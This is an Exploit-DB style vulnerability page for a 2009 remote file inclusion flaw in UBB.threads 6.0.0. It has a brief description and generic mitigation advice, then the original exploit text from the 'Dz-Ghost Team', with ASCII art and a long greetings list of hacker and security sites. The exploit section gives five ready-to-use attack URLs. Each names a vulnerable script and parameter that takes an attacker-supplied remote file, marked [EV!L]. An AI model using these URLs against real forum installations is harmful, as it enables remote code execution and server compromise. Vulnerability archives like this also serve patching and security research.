UBB.threads 6 RFI Vulnerability

vendor:

UBB.threads

by:

indoushka

9.3

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: UBB.threads

Affected Version From: 6.0.0

Affected Version To: 6.0.0

Patch Exists: NO

Related CWE: N/A

CPE: a:infopop:ubb.threads:6.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

UBB.threads 6 RFI Vulnerability

UBB.threads 6 is vulnerable to Remote File Inclusion (RFI) attacks. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains a malicious file which is then executed on the vulnerable server. This can lead to the attacker gaining access to the server and executing arbitrary code.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application. Additionally, the application should be kept up to date with the latest security patches.

Source

Exploit-DB raw data:

                       ..:::::::::..
                    ..:::aad8888888baa:::..
                 .::::d:?88888888888?::8b::::.
               .:::d8888:?88888888??a888888b:::.
             .:::d8888888a8888888aa8888888888b:::.
            ::::dP::::::::Dz-GhostTeam:::::::Yb::::
           ::::dP:::::::::Y888888888P:::::::::Yb::::
          ::::d8:::::::::::indoushka:::::::::::8b::::
         .::::88::::::::::::Y88888P::::::::::::88::::.
         :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P:::::
         :::::::Y88888888888P::|::Y88888888888P:::::::
         ::::::::::::::::888:::|:::888::::::::::::::::
         `:::::::::::::::8888888888888b::::::::::::::'
          :::::::::::::::88888888888888::::::::::::::
           :::::::::::::d88888888888888:::::::::::::
            ::::::::::::88::88::88:::88::::::::::::
             `::::::::::88::88::88:::88::::::::::'
               `::::::::88::88::P::::88::::::::'
                 `::::::88::88:::::::88::::::'
                    ``:::::::::::::::::::''
                         ``:::::::::''
            this file brought to you by Dz-Ghost Team


       |Redda | Saousha | indoushka | Mr.Sql | XxProratxX |


                           ÈÓã Çááå ÇáÑÍãä ÇáÑÍíã
  --                    [ Dz-Ghost Team ]                           ---
-------------------------------------------------------------------------
# Author  : indoushka
# email   : indoushka@hotmail.com
# Home    : ãÄÓÓÉ ÇÚÇÏÉ ÇáÊÑÈíÉ Ãã ÇáÈæÇÞí 04325
# Script  : powered by UBB.threads, Version 6 (Powered by infopop)
# Bug     : RFI
======================         Dz-Ghost Team           ===================
# Exploit  :
 

1- http://server/ubbthreads/cron/php/subscriptions.php?myprefs[language]}=[EV!L]
2- http://server/ubbthreads/cron/php/subscriptions.php?thispath=[EV!L]
3- http://server/ubbthreads/viewmessage.php?myprefs[language]}=[EV!L]
4- http://server/ubbthreads/viewfavorites.php?tempstyle=[EV!L]
5- http://server/ubbthreads/verifyemail.php?thispath=[EV!L]


=========================Dz-Ghost Team===================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com  
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)  
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com 
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com 
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com 
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
-------------------------------------------------------------------------